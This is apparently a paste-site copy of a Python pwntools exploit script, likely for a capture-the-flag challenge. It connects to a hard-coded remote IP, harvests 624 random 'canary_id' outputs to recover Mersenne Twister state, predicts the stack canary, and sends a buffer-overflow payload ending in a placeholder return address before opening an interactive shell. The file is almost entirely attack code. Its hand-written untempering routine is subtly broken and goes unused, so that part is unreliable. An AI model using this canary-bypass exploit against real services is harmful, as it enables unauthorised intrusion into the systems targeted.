Untitled
unknown
python
a year ago
3.5 kB
6
Indexable
from pwn import * import struct import random from mt19937predictor import MT19937Predictor predictor = MT19937Predictor() class MersenneTwisterPredictor: def __init__(self, observed_values): self.MT = [0] * 624 self.index = 0 self.predict(observed_values) def predict(self, observed_values): for i in range(624): self.MT[i] = self.un_temper(observed_values[i]) self.index = 624 def un_temper(self, y): # Reverse y ^= (y >> 18) y ^= (y >> 18) # Reverse y ^= (y << 15) & 0xefc60000 y ^= (y << 15) & 0xefc60000 # Reverse y ^= (y << 7) & 0x9d2c5680 y ^= (y << 7) & 0x9d2c5680 y ^= (y << 7) & 0x9d2c5680 y ^= (y << 7) & 0x9d2c5680 y ^= (y << 7) & 0x9d2c5680 # Reverse y ^= (y >> 11) y ^= (y >> 11) y ^= (y >> 11) return y def extract_number(self): if self.index >= 624: self.twist() y = self.MT[self.index] y ^= (y >> 11) y ^= (y << 7) & 0x9d2c5680 y ^= (y << 15) & 0xefc60000 y ^= (y >> 18) self.index += 1 return y & 0xffffffff def twist(self): for i in range(624): y = (self.MT[i] & 0x80000000) | (self.MT[(i + 1) % 624] & 0x7fffffff) self.MT[i] = self.MT[(i + 397) % 624] ^ (y >> 1) if y % 2 != 0: # equivalent to checking the lowest bit self.MT[i] ^= 0x9908b0df self.index = 0 def collect_mt_outputs(conn): outputs = [] conn.sendline(b'c') for _ in range(624): # Send 'c' to request canary_id conn.sendline('y') conn.recvuntil(b"canary_id: ") canary_id = int(conn.recvline().strip()) print(canary_id) outputs.append(canary_id) #conn.sendline(b'y') return outputs def exploit(conn, predicted_canary): print(predicted_canary) ''' conn.sendline(b'c') # Request one more canary conn.recvuntil(b"canary_id: ") actual_canary = int(conn.recvline().strip()) print("actual canary: ", actual_canary) print("predicted canary: ", predicted_canary) print(f"Actual next canary: {actual_canary:08x}") print(f"Predicted canary: {predicted_canary:08x}") if predicted_canary == actual_canary: print("Prediction successful!") else: print("Prediction failed.") ''' # Craft payload buffer_size = 256 # Adjust this based on the actual buffer size payload = b"A" * buffer_size payload += struct.pack("<I", predicted_canary) # Assuming 32-bit canary payload += b"B" * 12 # Padding to reach return address payload += p32(0xdeadbeef) # Fake return address (replace with actual exploit) # Send payload conn.sendline(payload) # Try to get a shell conn.interactive() def main(): # Connect to the service conn = remote('3.81.92.37', 4242) # Collect MT outputs mt_outputs = collect_mt_outputs(conn) # Predict next canary #p = MersenneTwisterPredictor(mt_outputs) #with open('data.txt', 'r') as file: for n in mt_outputs: predictor.setrandbits(n, 32) #print("calculator: ", predictor.getrandbits(32)) #predicted_canary = p.extract_number() #print(f"Predicted canary: {predicted_canary:08x}") # Exploit using predicted canary predicted_canary = predictor.getrandbits(32) exploit(conn, predicted_canary) if __name__ == "__main__": main()
Editor is loading...
Leave a Comment